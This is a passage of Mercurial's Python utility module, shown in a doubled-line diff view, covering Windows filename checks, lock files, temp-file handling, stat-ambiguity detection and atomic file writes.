1889 >>> checkwinfilename(b"foo/bar/xml.con")
1887 >>> checkwinfilename(b"foo/bar/xml.con")
1890 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1888 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1891 "filename contains 'AUX', which is reserved on Windows"
1889 "filename contains 'AUX', which is reserved on Windows"
1892 >>> checkwinfilename(b"foo/bar/bla:.txt")
1890 >>> checkwinfilename(b"foo/bar/bla:.txt")
1893 "filename contains ':', which is reserved on Windows"
1891 "filename contains ':', which is reserved on Windows"
1894 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1892 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1895 "filename contains '\\x07', which is invalid on Windows"
1893 "filename contains '\\x07', which is invalid on Windows"
1896 >>> checkwinfilename(b"foo/bar/bla ")
1894 >>> checkwinfilename(b"foo/bar/bla ")
1897 "filename ends with ' ', which is not allowed on Windows"
1895 "filename ends with ' ', which is not allowed on Windows"
1898 >>> checkwinfilename(b"../bar")
1896 >>> checkwinfilename(b"../bar")
1899 >>> checkwinfilename(b"foo\\")
1897 >>> checkwinfilename(b"foo\\")
1900 "filename ends with '\\', which is invalid on Windows"
1898 "filename ends with '\\', which is invalid on Windows"
1901 >>> checkwinfilename(b"foo\\/bar")
1899 >>> checkwinfilename(b"foo\\/bar")
1902 "directory name ends with '\\', which is invalid on Windows"
1900 "directory name ends with '\\', which is invalid on Windows"
1903 '''
1901 '''
1904 if path.endswith('\\'):
1902 if path.endswith('\\'):
1905 return _("filename ends with '\\', which is invalid on Windows")
1903 return _("filename ends with '\\', which is invalid on Windows")
1906 if '\\/' in path:
1904 if '\\/' in path:
1907 return _("directory name ends with '\\', which is invalid on Windows")
1905 return _("directory name ends with '\\', which is invalid on Windows")
1908 for n in path.replace('\\', '/').split('/'):
1906 for n in path.replace('\\', '/').split('/'):
1909 if not n:
1907 if not n:
1910 continue
1908 continue
1911 for c in _filenamebytestr(n):
1909 for c in _filenamebytestr(n):
1912 if c in _winreservedchars:
1910 if c in _winreservedchars:
1913 return _("filename contains '%s', which is reserved "
1911 return _("filename contains '%s', which is reserved "
1914 "on Windows") % c
1912 "on Windows") % c
1915 if ord(c) <= 31:
1913 if ord(c) <= 31:
1916 return _("filename contains '%s', which is invalid "
1914 return _("filename contains '%s', which is invalid "
1917 "on Windows") % stringutil.escapestr(c)
1915 "on Windows") % stringutil.escapestr(c)
1918 base = n.split('.')[0]
1916 base = n.split('.')[0]
1919 if base and base.lower() in _winreservednames:
1917 if base and base.lower() in _winreservednames:
1920 return _("filename contains '%s', which is reserved "
1918 return _("filename contains '%s', which is reserved "
1921 "on Windows") % base
1919 "on Windows") % base
1922 t = n[-1:]
1920 t = n[-1:]
1923 if t in '. ' and n not in '..':
1921 if t in '. ' and n not in '..':
1924 return _("filename ends with '%s', which is not allowed "
1922 return _("filename ends with '%s', which is not allowed "
1925 "on Windows") % t
1923 "on Windows") % t
1926
1924
1927 if pycompat.iswindows:
1925 if pycompat.iswindows:
1928 checkosfilename = checkwinfilename
1926 checkosfilename = checkwinfilename
1929 timer = time.clock
1927 timer = time.clock
1930 else:
1928 else:
1931 checkosfilename = platform.checkosfilename
1929 checkosfilename = platform.checkosfilename
1932 timer = time.time
1930 timer = time.time
1933
1931
1934 if safehasattr(time, "perf_counter"):
1932 if safehasattr(time, "perf_counter"):
1935 timer = time.perf_counter
1933 timer = time.perf_counter
1936
1934
1937 def makelock(info, pathname):
1935 def makelock(info, pathname):
1938 """Create a lock file atomically if possible
1936 """Create a lock file atomically if possible
1939
1937
1940 This may leave a stale lock file if symlink isn't supported and signal
1938 This may leave a stale lock file if symlink isn't supported and signal
1941 interrupt is enabled.
1939 interrupt is enabled.
1942 """
1940 """
1943 try:
1941 try:
1944 return os.symlink(info, pathname)
1942 return os.symlink(info, pathname)
1945 except OSError as why:
1943 except OSError as why:
1946 if why.errno == errno.EEXIST:
1944 if why.errno == errno.EEXIST:
1947 raise
1945 raise
1948 except AttributeError: # no symlink in os
1946 except AttributeError: # no symlink in os
1949 pass
1947 pass
1950
1948
1951 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1949 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1952 ld = os.open(pathname, flags)
1950 ld = os.open(pathname, flags)
1953 os.write(ld, info)
1951 os.write(ld, info)
1954 os.close(ld)
1952 os.close(ld)
1955
1953
1956 def readlock(pathname):
1954 def readlock(pathname):
1957 try:
1955 try:
1958 return os.readlink(pathname)
1956 return os.readlink(pathname)
1959 except OSError as why:
1957 except OSError as why:
1960 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1958 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1961 raise
1959 raise
1962 except AttributeError: # no symlink in os
1960 except AttributeError: # no symlink in os
1963 pass
1961 pass
1964 fp = posixfile(pathname, 'rb')
1962 fp = posixfile(pathname, 'rb')
1965 r = fp.read()
1963 r = fp.read()
1966 fp.close()
1964 fp.close()
1967 return r
1965 return r
1968
1966
1969 def fstat(fp):
1967 def fstat(fp):
1970 '''stat file object that may not have fileno method.'''
1968 '''stat file object that may not have fileno method.'''
1971 try:
1969 try:
1972 return os.fstat(fp.fileno())
1970 return os.fstat(fp.fileno())
1973 except AttributeError:
1971 except AttributeError:
1974 return os.stat(fp.name)
1972 return os.stat(fp.name)
1975
1973
1976 # File system features
1974 # File system features
1977
1975
1978 def fscasesensitive(path):
1976 def fscasesensitive(path):
1979 """
1977 """
1980 Return true if the given path is on a case-sensitive filesystem
1978 Return true if the given path is on a case-sensitive filesystem
1981
1979
1982 Requires a path (like /foo/.hg) ending with a foldable final
1980 Requires a path (like /foo/.hg) ending with a foldable final
1983 directory component.
1981 directory component.
1984 """
1982 """
1985 s1 = os.lstat(path)
1983 s1 = os.lstat(path)
1986 d, b = os.path.split(path)
1984 d, b = os.path.split(path)
1987 b2 = b.upper()
1985 b2 = b.upper()
1988 if b == b2:
1986 if b == b2:
1989 b2 = b.lower()
1987 b2 = b.lower()
1990 if b == b2:
1988 if b == b2:
1991 return True # no evidence against case sensitivity
1989 return True # no evidence against case sensitivity
1992 p2 = os.path.join(d, b2)
1990 p2 = os.path.join(d, b2)
1993 try:
1991 try:
1994 s2 = os.lstat(p2)
1992 s2 = os.lstat(p2)
1995 if s2 == s1:
1993 if s2 == s1:
1996 return False
1994 return False
1997 return True
1995 return True
1998 except OSError:
1996 except OSError:
1999 return True
1997 return True
2000
1998
2001 try:
1999 try:
2002 import re2
2000 import re2
2003 _re2 = None
2001 _re2 = None
2004 except ImportError:
2002 except ImportError:
2005 _re2 = False
2003 _re2 = False
2006
2004
2007 class _re(object):
2005 class _re(object):
2008 def _checkre2(self):
2006 def _checkre2(self):
2009 global _re2
2007 global _re2
2010 try:
2008 try:
2011 # check if match works, see issue3964
2009 # check if match works, see issue3964
2012 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2010 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2013 except ImportError:
2011 except ImportError:
2014 _re2 = False
2012 _re2 = False
2015
2013
2016 def compile(self, pat, flags=0):
2014 def compile(self, pat, flags=0):
2017 '''Compile a regular expression, using re2 if possible
2015 '''Compile a regular expression, using re2 if possible
2018
2016
2019 For best performance, use only re2-compatible regexp features. The
2017 For best performance, use only re2-compatible regexp features. The
2020 only flags from the re module that are re2-compatible are
2018 only flags from the re module that are re2-compatible are
2021 IGNORECASE and MULTILINE.'''
2019 IGNORECASE and MULTILINE.'''
2022 if _re2 is None:
2020 if _re2 is None:
2023 self._checkre2()
2021 self._checkre2()
2024 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2022 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2025 if flags & remod.IGNORECASE:
2023 if flags & remod.IGNORECASE:
2026 pat = '(?i)' + pat
2024 pat = '(?i)' + pat
2027 if flags & remod.MULTILINE:
2025 if flags & remod.MULTILINE:
2028 pat = '(?m)' + pat
2026 pat = '(?m)' + pat
2029 try:
2027 try:
2030 return re2.compile(pat)
2028 return re2.compile(pat)
2031 except re2.error:
2029 except re2.error:
2032 pass
2030 pass
2033 return remod.compile(pat, flags)
2031 return remod.compile(pat, flags)
2034
2032
2035 @propertycache
2033 @propertycache
2036 def escape(self):
2034 def escape(self):
2037 '''Return the version of escape corresponding to self.compile.
2035 '''Return the version of escape corresponding to self.compile.
2038
2036
2039 This is imperfect because whether re2 or re is used for a particular
2037 This is imperfect because whether re2 or re is used for a particular
2040 function depends on the flags, etc, but it's the best we can do.
2038 function depends on the flags, etc, but it's the best we can do.
2041 '''
2039 '''
2042 global _re2
2040 global _re2
2043 if _re2 is None:
2041 if _re2 is None:
2044 self._checkre2()
2042 self._checkre2()
2045 if _re2:
2043 if _re2:
2046 return re2.escape
2044 return re2.escape
2047 else:
2045 else:
2048 return remod.escape
2046 return remod.escape
2049
2047
2050 re = _re()
2048 re = _re()
2051
2049
2052 _fspathcache = {}
2050 _fspathcache = {}
2053 def fspath(name, root):
2051 def fspath(name, root):
2054 '''Get name in the case stored in the filesystem
2052 '''Get name in the case stored in the filesystem
2055
2053
2056 The name should be relative to root, and be normcase-ed for efficiency.
2054 The name should be relative to root, and be normcase-ed for efficiency.
2057
2055
2058 Note that this function is unnecessary, and should not be
2056 Note that this function is unnecessary, and should not be
2059 called, for case-sensitive filesystems (simply because it's expensive).
2057 called, for case-sensitive filesystems (simply because it's expensive).
2060
2058
2061 The root should be normcase-ed, too.
2059 The root should be normcase-ed, too.
2062 '''
2060 '''
2063 def _makefspathcacheentry(dir):
2061 def _makefspathcacheentry(dir):
2064 return dict((normcase(n), n) for n in os.listdir(dir))
2062 return dict((normcase(n), n) for n in os.listdir(dir))
2065
2063
2066 seps = pycompat.ossep
2064 seps = pycompat.ossep
2067 if pycompat.osaltsep:
2065 if pycompat.osaltsep:
2068 seps = seps + pycompat.osaltsep
2066 seps = seps + pycompat.osaltsep
2069 # Protect backslashes. This gets silly very quickly.
2067 # Protect backslashes. This gets silly very quickly.
2070 seps.replace('\\','\\\\')
2068 seps.replace('\\','\\\\')
2071 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2069 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2072 dir = os.path.normpath(root)
2070 dir = os.path.normpath(root)
2073 result = []
2071 result = []
2074 for part, sep in pattern.findall(name):
2072 for part, sep in pattern.findall(name):
2075 if sep:
2073 if sep:
2076 result.append(sep)
2074 result.append(sep)
2077 continue
2075 continue
2078
2076
2079 if dir not in _fspathcache:
2077 if dir not in _fspathcache:
2080 _fspathcache[dir] = _makefspathcacheentry(dir)
2078 _fspathcache[dir] = _makefspathcacheentry(dir)
2081 contents = _fspathcache[dir]
2079 contents = _fspathcache[dir]
2082
2080
2083 found = contents.get(part)
2081 found = contents.get(part)
2084 if not found:
2082 if not found:
2085 # retry "once per directory" per "dirstate.walk" which
2083 # retry "once per directory" per "dirstate.walk" which
2086 # may take place for each patches of "hg qpush", for example
2084 # may take place for each patches of "hg qpush", for example
2087 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2085 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2088 found = contents.get(part)
2086 found = contents.get(part)
2089
2087
2090 result.append(found or part)
2088 result.append(found or part)
2091 dir = os.path.join(dir, part)
2089 dir = os.path.join(dir, part)
2092
2090
2093 return ''.join(result)
2091 return ''.join(result)
2094
2092
2095 def checknlink(testfile):
2093 def checknlink(testfile):
2096 '''check whether hardlink count reporting works properly'''
2094 '''check whether hardlink count reporting works properly'''
2097
2095
2098 # testfile may be open, so we need a separate file for checking to
2096 # testfile may be open, so we need a separate file for checking to
2099 # work around issue2543 (or testfile may get lost on Samba shares)
2097 # work around issue2543 (or testfile may get lost on Samba shares)
2100 f1, f2, fp = None, None, None
2098 f1, f2, fp = None, None, None
2101 try:
2099 try:
2102 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2100 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2103 suffix='1~', dir=os.path.dirname(testfile))
2101 suffix='1~', dir=os.path.dirname(testfile))
2104 os.close(fd)
2102 os.close(fd)
2105 f2 = '%s2~' % f1[:-2]
2103 f2 = '%s2~' % f1[:-2]
2106
2104
2107 oslink(f1, f2)
2105 oslink(f1, f2)
2108 # nlinks() may behave differently for files on Windows shares if
2106 # nlinks() may behave differently for files on Windows shares if
2109 # the file is open.
2107 # the file is open.
2110 fp = posixfile(f2)
2108 fp = posixfile(f2)
2111 return nlinks(f2) > 1
2109 return nlinks(f2) > 1
2112 except OSError:
2110 except OSError:
2113 return False
2111 return False
2114 finally:
2112 finally:
2115 if fp is not None:
2113 if fp is not None:
2116 fp.close()
2114 fp.close()
2117 for f in (f1, f2):
2115 for f in (f1, f2):
2118 try:
2116 try:
2119 if f is not None:
2117 if f is not None:
2120 os.unlink(f)
2118 os.unlink(f)
2121 except OSError:
2119 except OSError:
2122 pass
2120 pass
2123
2121
2124 def endswithsep(path):
2122 def endswithsep(path):
2125 '''Check path ends with os.sep or os.altsep.'''
2123 '''Check path ends with os.sep or os.altsep.'''
2126 return (path.endswith(pycompat.ossep)
2124 return (path.endswith(pycompat.ossep)
2127 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2125 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2128
2126
2129 def splitpath(path):
2127 def splitpath(path):
2130 '''Split path by os.sep.
2128 '''Split path by os.sep.
2131 Note that this function does not use os.altsep because this is
2129 Note that this function does not use os.altsep because this is
2132 an alternative of simple "xxx.split(os.sep)".
2130 an alternative of simple "xxx.split(os.sep)".
2133 It is recommended to use os.path.normpath() before using this
2131 It is recommended to use os.path.normpath() before using this
2134 function if need.'''
2132 function if need.'''
2135 return path.split(pycompat.ossep)
2133 return path.split(pycompat.ossep)
2136
2134
2137 def gui():
2135 def gui():
2138 '''Are we running in a GUI?'''
2136 '''Are we running in a GUI?'''
2139 if pycompat.isdarwin:
2137 if pycompat.isdarwin:
2140 if 'SSH_CONNECTION' in encoding.environ:
2138 if 'SSH_CONNECTION' in encoding.environ:
2141 # handle SSH access to a box where the user is logged in
2139 # handle SSH access to a box where the user is logged in
2142 return False
2140 return False
2143 elif getattr(osutil, 'isgui', None):
2141 elif getattr(osutil, 'isgui', None):
2144 # check if a CoreGraphics session is available
2142 # check if a CoreGraphics session is available
2145 return osutil.isgui()
2143 return osutil.isgui()
2146 else:
2144 else:
2147 # pure build; use a safe default
2145 # pure build; use a safe default
2148 return True
2146 return True
2149 else:
2147 else:
2150 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2148 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2151
2149
2152 def mktempcopy(name, emptyok=False, createmode=None):
2150 def mktempcopy(name, emptyok=False, createmode=None):
2153 """Create a temporary file with the same contents from name
2151 """Create a temporary file with the same contents from name
2154
2152
2155 The permission bits are copied from the original file.
2153 The permission bits are copied from the original file.
2156
2154
2157 If the temporary file is going to be truncated immediately, you
2155 If the temporary file is going to be truncated immediately, you
2158 can use emptyok=True as an optimization.
2156 can use emptyok=True as an optimization.
2159
2157
2160 Returns the name of the temporary file.
2158 Returns the name of the temporary file.
2161 """
2159 """
2162 d, fn = os.path.split(name)
2160 d, fn = os.path.split(name)
2163 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2161 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2164 os.close(fd)
2162 os.close(fd)
2165 # Temporary files are created with mode 0600, which is usually not
2163 # Temporary files are created with mode 0600, which is usually not
2166 # what we want. If the original file already exists, just copy
2164 # what we want. If the original file already exists, just copy
2167 # its mode. Otherwise, manually obey umask.
2165 # its mode. Otherwise, manually obey umask.
2168 copymode(name, temp, createmode)
2166 copymode(name, temp, createmode)
2169 if emptyok:
2167 if emptyok:
2170 return temp
2168 return temp
2171 try:
2169 try:
2172 try:
2170 try:
2173 ifp = posixfile(name, "rb")
2171 ifp = posixfile(name, "rb")
2174 except IOError as inst:
2172 except IOError as inst:
2175 if inst.errno == errno.ENOENT:
2173 if inst.errno == errno.ENOENT:
2176 return temp
2174 return temp
2177 if not getattr(inst, 'filename', None):
2175 if not getattr(inst, 'filename', None):
2178 inst.filename = name
2176 inst.filename = name
2179 raise
2177 raise
2180 ofp = posixfile(temp, "wb")
2178 ofp = posixfile(temp, "wb")
2181 for chunk in filechunkiter(ifp):
2179 for chunk in filechunkiter(ifp):
2182 ofp.write(chunk)
2180 ofp.write(chunk)
2183 ifp.close()
2181 ifp.close()
2184 ofp.close()
2182 ofp.close()
2185 except: # re-raises
2183 except: # re-raises
2186 try:
2184 try:
2187 os.unlink(temp)
2185 os.unlink(temp)
2188 except OSError:
2186 except OSError:
2189 pass
2187 pass
2190 raise
2188 raise
2191 return temp
2189 return temp
2192
2190
2193 class filestat(object):
2191 class filestat(object):
2194 """help to exactly detect change of a file
2192 """help to exactly detect change of a file
2195
2193
2196 'stat' attribute is result of 'os.stat()' if specified 'path'
2194 'stat' attribute is result of 'os.stat()' if specified 'path'
2197 exists. Otherwise, it is None. This can avoid preparative
2195 exists. Otherwise, it is None. This can avoid preparative
2198 'exists()' examination on client side of this class.
2196 'exists()' examination on client side of this class.
2199 """
2197 """
2200 def __init__(self, stat):
2198 def __init__(self, stat):
2201 self.stat = stat
2199 self.stat = stat
2202
2200
2203 @classmethod
2201 @classmethod
2204 def frompath(cls, path):
2202 def frompath(cls, path):
2205 try:
2203 try:
2206 stat = os.stat(path)
2204 stat = os.stat(path)
2207 except OSError as err:
2205 except OSError as err:
2208 if err.errno != errno.ENOENT:
2206 if err.errno != errno.ENOENT:
2209 raise
2207 raise
2210 stat = None
2208 stat = None
2211 return cls(stat)
2209 return cls(stat)
2212
2210
2213 @classmethod
2211 @classmethod
2214 def fromfp(cls, fp):
2212 def fromfp(cls, fp):
2215 stat = os.fstat(fp.fileno())
2213 stat = os.fstat(fp.fileno())
2216 return cls(stat)
2214 return cls(stat)
2217
2215
2218 __hash__ = object.__hash__
2216 __hash__ = object.__hash__
2219
2217
2220 def __eq__(self, old):
2218 def __eq__(self, old):
2221 try:
2219 try:
2222 # if ambiguity between stat of new and old file is
2220 # if ambiguity between stat of new and old file is
2223 # avoided, comparison of size, ctime and mtime is enough
2221 # avoided, comparison of size, ctime and mtime is enough
2224 # to exactly detect change of a file regardless of platform
2222 # to exactly detect change of a file regardless of platform
2225 return (self.stat.st_size == old.stat.st_size and
2223 return (self.stat.st_size == old.stat.st_size and
2226 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2224 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2227 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2225 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2228 except AttributeError:
2226 except AttributeError:
2229 pass
2227 pass
2230 try:
2228 try:
2231 return self.stat is None and old.stat is None
2229 return self.stat is None and old.stat is None
2232 except AttributeError:
2230 except AttributeError:
2233 return False
2231 return False
2234
2232
2235 def isambig(self, old):
2233 def isambig(self, old):
2236 """Examine whether new (= self) stat is ambiguous against old one
2234 """Examine whether new (= self) stat is ambiguous against old one
2237
2235
2238 "S[N]" below means stat of a file at N-th change:
2236 "S[N]" below means stat of a file at N-th change:
2239
2237
2240 - S[n-1].ctime < S[n].ctime: can detect change of a file
2238 - S[n-1].ctime < S[n].ctime: can detect change of a file
2241 - S[n-1].ctime == S[n].ctime
2239 - S[n-1].ctime == S[n].ctime
2242 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2240 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2243 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2241 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2244 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2242 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2245 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2243 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2246
2244
2247 Case (*2) above means that a file was changed twice or more at
2245 Case (*2) above means that a file was changed twice or more at
2248 same time in sec (= S[n-1].ctime), and comparison of timestamp
2246 same time in sec (= S[n-1].ctime), and comparison of timestamp
2249 is ambiguous.
2247 is ambiguous.
2250
2248
2251 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2249 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2252 timestamp is ambiguous".
2250 timestamp is ambiguous".
2253
2251
2254 But advancing mtime only in case (*2) doesn't work as
2252 But advancing mtime only in case (*2) doesn't work as
2255 expected, because naturally advanced S[n].mtime in case (*1)
2253 expected, because naturally advanced S[n].mtime in case (*1)
2256 might be equal to manually advanced S[n-1 or earlier].mtime.
2254 might be equal to manually advanced S[n-1 or earlier].mtime.
2257
2255
2258 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2256 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2259 treated as ambiguous regardless of mtime, to avoid overlooking
2257 treated as ambiguous regardless of mtime, to avoid overlooking
2260 by confliction between such mtime.
2258 by confliction between such mtime.
2261
2259
2262 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2260 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2263 S[n].mtime", even if size of a file isn't changed.
2261 S[n].mtime", even if size of a file isn't changed.
2264 """
2262 """
2265 try:
2263 try:
2266 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2264 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2267 except AttributeError:
2265 except AttributeError:
2268 return False
2266 return False
2269
2267
2270 def avoidambig(self, path, old):
2268 def avoidambig(self, path, old):
2271 """Change file stat of specified path to avoid ambiguity
2269 """Change file stat of specified path to avoid ambiguity
2272
2270
2273 'old' should be previous filestat of 'path'.
2271 'old' should be previous filestat of 'path'.
2274
2272
2275 This skips avoiding ambiguity, if a process doesn't have
2273 This skips avoiding ambiguity, if a process doesn't have
2276 appropriate privileges for 'path'. This returns False in this
2274 appropriate privileges for 'path'. This returns False in this
2277 case.
2275 case.
2278
2276
2279 Otherwise, this returns True, as "ambiguity is avoided".
2277 Otherwise, this returns True, as "ambiguity is avoided".
2280 """
2278 """
2281 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2279 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2282 try:
2280 try:
2283 os.utime(path, (advanced, advanced))
2281 os.utime(path, (advanced, advanced))
2284 except OSError as inst:
2282 except OSError as inst:
2285 if inst.errno == errno.EPERM:
2283 if inst.errno == errno.EPERM:
2286 # utime() on the file created by another user causes EPERM,
2284 # utime() on the file created by another user causes EPERM,
2287 # if a process doesn't have appropriate privileges
2285 # if a process doesn't have appropriate privileges
2288 return False
2286 return False
2289 raise
2287 raise
2290 return True
2288 return True
2291
2289
2292 def __ne__(self, other):
2290 def __ne__(self, other):
2293 return not self == other
2291 return not self == other
2294
2292
2295 class atomictempfile(object):
2293 class atomictempfile(object):
2296 '''writable file object that atomically updates a file
2294 '''writable file object that atomically updates a file
2297
2295
2298 All writes will go to a temporary copy of the original file. Call
2296 All writes will go to a temporary copy of the original file. Call
2299 close() when you are done writing, and atomictempfile will rename
2297 close() when you are done writing, and atomictempfile will rename
2300 the temporary copy to the original name, making the changes
2298 the temporary copy to the original name, making the changes
2301 visible. If the object is destroyed without being closed, all your
2299 visible. If the object is destroyed without being closed, all your
2302 writes are discarded.
2300 writes are discarded.
2303
2301
2304 checkambig argument of constructor is used with filestat, and is
2302 checkambig argument of constructor is used with filestat, and is
2305 useful only if target file is guarded by any lock (e.g. repo.lock
2303 useful only if target file is guarded by any lock (e.g. repo.lock
2306 or repo.wlock).
2304 or repo.wlock).
2307 '''
2305 '''
2308 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2306 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2309 self.__name = name # permanent name
2307 self.__name = name # permanent name
2310 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2308 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2311 createmode=createmode)
2309 createmode=createmode)
2312 self._fp = posixfile(self._tempname, mode)
2310 self._fp = posixfile(self._tempname, mode)
2313 self._checkambig = checkambig
2311 self._checkambig = checkambig
2314
2312
2315 # delegated methods
2313 # delegated methods
2316 self.read = self._fp.read
2314 self.read = self._fp.read
2317 self.write = self._fp.write
2315 self.write = self._fp.write
2318 self.seek = self._fp.seek
2316 self.seek = self._fp.seek
2319 self.tell = self._fp.tell
2317 self.tell = self._fp.tell
2320 self.fileno = self._fp.fileno
2318 self.fileno = self._fp.fileno
2321
2319
2322 def close(self):
2320 def close(self):
2323 if not self._fp.closed:
2321 if not self._fp.closed:
2324 self._fp.close()
2322 self._fp.close()
2325 filename = localpath(self.__name)
2323 filename = localpath(self.__name)
2326 oldstat = self._checkambig and filestat.frompath(filename)
2324 oldstat = self._checkambig and filestat.frompath(filename)
2327 if oldstat and oldstat.stat:
2325 if oldstat and oldstat.stat:
2328 rename(self._tempname, filename)
2326 rename(self._tempname, filename)
2329 newstat = filestat.frompath(filename)
2327 newstat = filestat.frompath(filename)
2330 if newstat.isambig(oldstat):
2328 if newstat.isambig(oldstat):
2331 # stat of changed file is ambiguous to original one
2329 # stat of changed file is ambiguous to original one
2332 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2330 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2333 os.utime(filename, (advanced, advanced))
2331 os.utime(filename, (advanced, advanced))
2334 else:
2332 else:
2335 rename(self._tempname, filename)
2333 rename(self._tempname, filename)
2336
2334
2337 def discard(self):
2335 def discard(self):
2338 if not self._fp.closed:
2336 if not self._fp.closed:
2339 try:
2337 try:
2340 os.unlink(self._tempname)
2338 os.unlink(self._tempname)
2341 except OSError:
2339 except OSError:
2342 pass
2340 pass
2343 self._fp.close()
2341 self._fp.close()
2344
2342
2345 def __del__(self):
2343 def __del__(self):
2346 if safehasattr(self, '_fp'): # constructor actually did something
2344 if safehasattr(self, '_fp'): # constructor actually did something
2347 self.discard()
2345 self.discard()
2348
2346
2349 def __enter__(self):
2347 def __enter__(self):
2350 return self
2348 return self
2351
2349
2352 def __exit__(self, exctype, excvalue, traceback):
2350 def __exit__(self, exctype, excvalue, traceback):
2353 if exctype is not None:
2351 if exctype is not None:
2354 self.discard()
2352 self.discard()
2355 else:
2353 else:
2356 self.close()
2354 self.close()
2357
2355
2358 def unlinkpath(f, ignoremissing=False):
2356 def unlinkpath(f, ignoremissing=False):
2359 """unlink and remove the directory if it is empty"""
2357 """unlink and remove the directory if it is empty"""
2360 if ignoremissing:
2358 if ignoremissing:
2361 tryunlink(f)
2359 tryunlink(f)
2362 else:
2360 else:
2363 unlink(f)
2361 unlink(f)
2364 # try removing directories that might now be empty
2362 # try removing directories that might now be empty
2365 try:
2363 try:
2366 removedirs(os.path.dirname(f))
2364 removedirs(os.path.dirname(f))
2367 except OSError:
2365 except OSError:
2368 pass
2366 pass
2369
2367
2370 def tryunlink(f):
2368 def tryunlink(f):
2371 """Attempt to remove a file, ignoring ENOENT errors."""
2369 """Attempt to remove a file, ignoring ENOENT errors."""
2372 try:
2370 try:
2373 unlink(f)
2371 unlink(f)
2374 except OSError as e:
2372 except OSError as e:
2375 if e.errno != errno.ENOENT:
2373 if e.errno != errno.ENOENT:
2376 raise
2374 raise
2377
2375
2378 def makedirs(name, mode=None, notindexed=False):
2376 def makedirs(name, mode=None, notindexed=False):
2379 """recursive directory creation with parent mode inheritance
2377 """recursive directory creation with parent mode inheritance
2380
2378
2381 Newly created directories are marked as "not to be indexed by
2379 Newly created directories are marked as "not to be indexed by
2382 the content indexing service", if ``notindexed`` is specified
2380 the content indexing service", if ``notindexed`` is specified
2383 for "write" mode access.
2381 for "write" mode access.
2384 """
2382 """
2385 try:
2383 try:
2386 makedir(name, notindexed)
2384 makedir(name, notindexed)
2387 except OSError as err:
2385 except OSError as err:
2388 if err.errno == errno.EEXIST:
2386 if err.errno == errno.EEXIST:
2389 return
2387 return
2390 if err.errno != errno.ENOENT or not name:
2388 if err.errno != errno.ENOENT or not name:
2391 raise
2389 raise
2392 parent = os.path.dirname(os.path.abspath(name))
2390 parent = os.path.dirname(os.path.abspath(name))
2393 if parent == name:
2391 if parent == name:
2394 raise
2392 raise
2395 makedirs(parent, mode, notindexed)
2393 makedirs(parent, mode, notindexed)
2396 try:
2394 try:
2397 makedir(name, notindexed)
2395 makedir(name, notindexed)
2398 except OSError as err:
2396 except OSError as err:
2399 # Catch EEXIST to handle races
2397 # Catch EEXIST to handle races
2400 if err.errno == errno.EEXIST:
2398 if err.errno == errno.EEXIST:
2401 return
2399 return
2402 raise
2400 raise
2403 if mode is not None:
2401 if mode is not None:
2404 os.chmod(name, mode)
2402 os.chmod(name, mode)
2405
2403
2406 def readfile(path):
2404 def readfile(path):
2407 with open(path, 'rb') as fp:
2405 with open(path, 'rb') as fp:
2408 return fp.read()
2406 return fp.read()
2409
2407
2410 def writefile(path, text):
2408 def writefile(path, text):
2411 with open(path, 'wb') as fp:
2409 with open(path, 'wb') as fp:
2412 fp.write(text)
2410 fp.write(text)
2413
2411
2414 def appendfile(path, text):
2412 def appendfile(path, text):
2415 with open(path, 'ab') as fp:
2413 with open(path, 'ab') as fp:
2416 fp.write(text)
2414 fp.write(text)
2417
2415
